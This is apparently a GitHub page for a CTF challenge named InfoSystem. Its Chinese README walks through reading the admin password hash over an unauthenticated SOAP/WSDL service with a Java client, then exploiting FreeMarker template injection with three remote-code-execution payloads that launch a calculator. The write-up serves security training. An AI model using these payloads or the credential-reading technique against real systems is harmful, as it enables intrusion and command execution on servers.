Skip to content

InfoSystem

Directory actions

More options

Directory actions

More options

Latest commit

 

History

History

InfoSystem

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
docker
docker
 
 
source/infosystem
source/infosystem
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 

README.md

InfoSystem

首先是对登陆进行抓包,发现发送了两个数据包,一个是登陆前台,一个是登陆后台:

image-20211124190636777

image-20211124190657633

访问后台路由/admin/externalLogin,重定向到/admin,是后台的登陆界面:

image-20211124190720345

对这个路由进行扫描,发现可以未授权访问的wsdl:

image-20211124190744942

其中loadUserByUsername可以通过用户名读取密码的哈希值,编写一个soap客户端来尝试读取admin

public class Main {
    public static void main(String[] args) {
        JaxWsDynamicClientFactory factory = JaxWsDynamicClientFactory.newInstance();
        Client client = factory.createClient("http://infosystem:8081/admin/service/UserService?wsdl");
        try {
            Object[] objects = client.invoke("loadUserByUsername", "admin");
            Arrays.stream(objects).forEach(System.out::println);
            client.destroy();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

成功读取:

image-20211101012301594

用这个账号和密码登录后台:

image-20211101012349859

其中在新闻发布 & 新闻列表中存在freemarker的模板注入:

image-20211101012427785

image-20211101012439444

可用payload:

<#assign value="freemarker.template.utility.Execute"?new()>${value("open -a Calculator")}

<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()}

<#assign value="freemarker.template.utility.JythonRuntime"?new()><@value>import os;os.system("calc.exe")</@value>